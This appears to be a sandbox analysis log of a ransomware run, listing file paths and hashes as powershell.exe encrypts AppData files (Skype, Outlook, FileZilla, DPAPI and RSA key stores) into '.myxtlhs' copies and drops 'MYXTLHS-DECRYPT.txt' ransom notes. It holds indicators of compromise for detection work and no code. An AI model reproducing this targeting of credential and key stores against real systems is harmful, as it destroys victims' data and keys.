C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\ecscache.json.myxtlhs
binary
MD5: f53a2172d5850896f24bde96a65e460d
SHA256: 324c9feb099acdc327a287088f3d0e1cbd0f7273948fa7c5d252e55d08528220
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\en-US.bdic.myxtlhs
binary
MD5: 2aaefc3dd531d602cc314ed6c9fa5f57
SHA256: f25a774d7cfaac91aef7030c074aaaa27fb20a5d5185cd6f9f2b9c3f39d2c1c9
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\ecscache.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\en-US.bdic
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\databases\Databases.db.myxtlhs
binary
MD5: d677a5968cae8d72243a291d9e98e3bc
SHA256: b596a190b51f7c20206bebe3e0035d0f519a28bc61f764a16667f44e8c1a32a2
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\device-info.json.myxtlhs
binary
MD5: d9dcc8f679a0169762f96a248f012f74
SHA256: e8dcffa76ebdf3f8d1036424c90e2898d3fad6510fe537a9263d9b6dbcf496c4
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\databases\Databases.db
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\device-info.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\index.myxtlhs
binary
MD5: a4b5f6e59bb84b72920f066df58788a7
SHA256: 3d62c6bb06d88bad580653c193852e0b6fe7537790207c8d0cb618972c5adb3c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\databases\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cookies.myxtlhs
binary
MD5: d3d9d3f9108506cdbb82c3881eababd7
SHA256: da26d70e407ad597bd4801cc45cc02781c01530425a14efdbc342102efaa32ff
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cookies
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\index
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000004.myxtlhs
binary
MD5: 9b2b284d68c62ac772e9efe64728c542
SHA256: ab30d8835f770d052d8277380df507743ba61c9c8bab9da67154107f395a9046
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000004
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000001.myxtlhs
binary
MD5: 88d8a8aa2da030fed5f5bb52bc9d1f47
SHA256: 277fdc5e04d7164ef900cb2e4a41d2fb5093056dd4fd0dd4a0a0a59eb270d797
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000003.myxtlhs
binary
MD5: a7aa74c6ebfc4bd4c43c9d70e992a935
SHA256: ba1a2880ee3307899252c61f12aa2e9b7f7fe5ae7119a36eec1f5443c535cb0c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000002.myxtlhs
binary
MD5: f224442cc8908e32d3de35b31945d3fc
SHA256: 402cfd0fb6a0cac28f079a825fc1faad6cf2a8e5ba38453ebd80699b37d3fcc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000003
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000002
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000001
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_3
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_3.myxtlhs
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_2.myxtlhs
binary
MD5: 79e0d5883496f10cd1d86c899a63bd05
SHA256: af2741971a64a11781aabc540c6e565500da78d29da7020e11f6ddc818ba9fbe
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_2
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_1.myxtlhs
flc
MD5: 4360e0714b17511c525f8ee12f8720c3
SHA256: 5db01832553ecc9955e2353b28257b529a8e9140d37cbbe5971c66d21ce35729
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_1
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher Building Blocks\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_0.myxtlhs
binary
MD5: 35c63ee98c5f695e63657b014b5446f6
SHA256: 2266b928ba698f320fb5eb6714c0b60b2fc04cfdf949389211ea9ace79b6e9a8
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Signatures\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml.myxtlhs
binary
MD5: f5c742b2d7b213b9c2c3447b6a12622b
SHA256: 0dce53e26ef60e004e93d90b8324e891d0d43fee9e5af62cb9b41aa101ddc0ac
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_0
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\CREDHIST.myxtlhs
binary
MD5: b849549bc599682574c0798620eddc6e
SHA256: 9425e9baaae3a0f8fb6d7999557e8443b3f1a3585c00fc7597e4dc6911c4b68b
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\54ba308a-6a9a-4e0e-b137-b89d3579498b.myxtlhs
binary
MD5: 8d0031d25d49e9bda98c214bed77bef9
SHA256: 065e858ccc9d4938f9ea20bed47bd22b3dbd8c24d740fa7539f5a2bb9acfec77
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\29fd2168-360f-422a-a685-e6961ea74ba8.myxtlhs
binary
MD5: 64aa06e1c9becd57275e1f71d10c5272
SHA256: 323fdd6944004e84a3966e98177618198c5fdb212558f974ac995265a068a272
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\Preferred.myxtlhs
binary
MD5: d9da2bfc77380f7ca53be34145f2efcf
SHA256: 58eb693aa3d5335072b56bb7657a265bcdf0cd561c4e187f4f6111c25113c84b
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\29fd2168-360f-422a-a685-e6961ea74ba8
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\Preferred
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\CREDHIST
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\54ba308a-6a9a-4e0e-b137-b89d3579498b
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.srs.myxtlhs
binary
MD5: d817d7f8e5921959ef945215742b85f6
SHA256: ce164bc6064db4917c6b9cade8769efde9b83885328343dc6077a39853a71343
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\PowerPoint\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Proof\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.xml.myxtlhs
binary
MD5: 54d600eca907d782f8e9d623db7ff5bc
SHA256: 50da007bc3fa7657b956b42d93c7b04763aeb37f16ffe2d70f7338ca576cfacc
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.srs
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\NoMail.xml.myxtlhs
binary
MD5: 4e151fd471e62a635b61739491b660c0
SHA256: 8500ca02257a19f4a2f5ff442c1d1a5d56d7128ba7d1b163fa569d10c9ae5d61
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.srs.myxtlhs
binary
MD5: b614a89db1d0fb2392338f21cccd26e1
SHA256: 630a7b45389a08bee70334b14fe2d4d3acb54d4759bbfecdb6d6c2b41ff879ab
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.xml.myxtlhs
binary
MD5: fd7ad121dd5a7664fe444b5f5981e1df
SHA256: 3eb31310e9bfb5a42d9f6b82edeb81681627ba260be1c6969a05011390ddc6a7
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\NoMail.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.srs
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\14.0\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\14.0\Preferences.dat.myxtlhs
binary
MD5: 7f8f98d895aed5a596cf01c0ef3c623e
SHA256: cf9041ba741e66ea869e073db0fe62564d09ddd9a170b44b018bf4c3e44b730c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\14.0\Preferences.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\MSO1033.acl.myxtlhs
binary
MD5: 066ac89a300f5abac6f8387d44772e9b
SHA256: 20bb1829e67ceb070dc6b0b83163cf07558cb786c887dedd8f39780eda2c1d52
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\MSO1033.acl
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\MMC\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\MMC\taskschd.myxtlhs
binary
MD5: 883dff6f2c407e51657cda226a2b00fd
SHA256: ecc5a43bdb1029752080b2b0352606150b471165a53db23de80c9df36c3613f1
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\Pbk\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\MMC\taskschd
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\HTML Help\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\HTML Help\hh.dat.myxtlhs
binary
MD5: 20fd7e8b035f51a538d68774936ea6d4
SHA256: 482552a342e89967c0ac1cef48236343cc5d9cdb82314c41c3e5ea76305bbc1f
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\HTML Help\hh.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Excel\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Excel\XLSTART\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx.myxtlhs
binary
MD5: 910c33a18299a7816f056d184d6a0074
SHA256: 1b8b93534330201f414c1c257ce5132cbfa1048bdf07fd97f2fe34e35b3efe3a
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\e3f86d7936454598ef98443d4fd3260d_90059c37-1320-41a4-b58d-2b75a9850d2f.myxtlhs
binary
MD5: 9ae5e5bb9b01697ae27b9a919b36bebc
SHA256: 7a6c8758f1e22f6353d9e713fbbdcc5f05a8682c8daa04965da5acc8fb785c08
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\c43c9d3341c1ddc712bbe39db3c78fa5_90059c37-1320-41a4-b58d-2b75a9850d2f.myxtlhs
binary
MD5: 3a70716df0fa19ff0b7335890a9848f6
SHA256: 697a5da24638bbc16aaa64ba86bb980c29bb1db1574627eb2077eebb5c97ff56
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\a551dda6b1d5ee0d0c4637af6c004413_90059c37-1320-41a4-b58d-2b75a9850d2f.myxtlhs
binary
MD5: 3d47612c7b4deb0e41cce42a7907a7e4
SHA256: a847bdf8df66889f3fd6a46f3a357dfd54157b5e9b3cdbd2acb6d0b35432dd27
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\e3f86d7936454598ef98443d4fd3260d_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\c43c9d3341c1ddc712bbe39db3c78fa5_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\a551dda6b1d5ee0d0c4637af6c004413_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\7be1242ebc44e45985bd1ffa382e997c_90059c37-1320-41a4-b58d-2b75a9850d2f.myxtlhs
fli
MD5: 21895f9231a34b6581b857d701374f85
SHA256: 12fac1f159bba49dc89950e980329f3124a45972d314d23e87dcc978c2bb5795
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\1f91d2d17ea675d4c2c3192e241743f9_90059c37-1320-41a4-b58d-2b75a9850d2f.myxtlhs
binary
MD5: a464aa32ed2a4c6536cf62a79c0b3d0c
SHA256: dc926283aef9c9235e3c2cddd4f035c31ae48beebfa40fb0f7daa6a0e49dddbc
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\1f91d2d17ea675d4c2c3192e241743f9_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\7be1242ebc44e45985bd1ffa382e997c_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f.myxtlhs
binary
MD5: 2b630a3f54e2c392e104f156e3b11f9d
SHA256: 8265e47b8222f2867f4a16d56fc5ceb2529f40aa1b51ee298e1d6e30ba1ef4da
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Identities\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Media Center Programs\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Identities\{E4CE17A7-FC47-4CD1-8FF6-45436C8F45DB}\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\AddIns\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\queue.sqlite3.myxtlhs
binary
MD5: 5c57c4e65cdc4661eddb20c40a6528d2
SHA256: e4e214b618f4d39de5311ee99224249c261b7fd30ac34a5aa4d625fb2c91f01a
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Credentials\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\queue.sqlite3
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.myxtlhs
flc
MD5: 0f276636c0b5166be7638302ec499638
SHA256: 18d7425427b631a7e32b62894d9e94db019bcf4053d7cff744049d8fc29c206a
1684
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\layout.xml.myxtlhs
binary
MD5: 95499dadf3579cd4e98fb408d3353b7a
SHA256: 6f90f88b6f7951a3bca9cac1519360516c65d2f67169a17fd42ce42365727ffa
1684
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\filezilla.xml.myxtlhs
binary
MD5: 7502dbc8714bcb15d450f8e51e476138
SHA256: acbc30534b6db80b1990e183141ba342a0c0ac7764affb47e3209af6b1f98c08
1684
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\filezilla.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\layout.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
